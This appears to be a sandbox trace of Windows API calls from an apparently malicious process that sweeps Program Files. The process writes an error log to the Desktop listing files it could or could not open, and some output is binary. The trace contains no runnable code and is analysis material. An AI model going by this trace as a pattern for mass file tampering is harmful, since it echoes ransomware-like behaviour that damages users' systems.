Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\n", cchWideChar=1275, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1275 [0269.397] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\n", cchWideChar=1275, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1275 [0269.397] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\n", cchWideChar=1275, lpMultiByteStr=0x2472968, cbMultiByte=1275, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nÅ\x0fD\x058\x8fXw¿Ô/­¨/+Ú³É\x1bŦ/k\x998v®,\\ÙfPú4(¬\x84ðGåP¯N\x1fk¹ð\x03'K\x17ĵº÷²\x84×D \x8c\x9aË\x19\x87ÁÒçÞjü¶Í¥£¶õ\x1c\x84¨\x1dqÑØ£Ù3£G\x7fÞZ½\x04mmï\x87ï\x9b&?ð\x1a1ã 8\x01+\x87ÛJî µ\n©^¡æØWõâPvú8#!t\x07yz\x11\x0f±Úð×Áéf\x18Aغà}\nê\x0bÞ§`\x0bÁÌ\x87#çü»[w\x83I4/\x980ËÉâ\x05\x91]Ë\x82Eó\x0c\x0fN¾ø¶ê\x8c3Ó\x0e", lpUsedDefaultChar=0x0) returned 4198 [0283.419] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ed2b78*, nNumberOfBytesToWrite=0x1066, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ed2b78*, lpNumberOfBytesWritten=0x63fe20*=0x1066, lpOverlapped=0x0) returned 1 [0283.420] CloseHandle (hObject=0x2cc) returned 1 [0283.420] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16363, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16363 [0283.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16363, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16363 [0283.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16363, lpMultiByteStr=0x24667d8, cbMultiByte=16363, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows 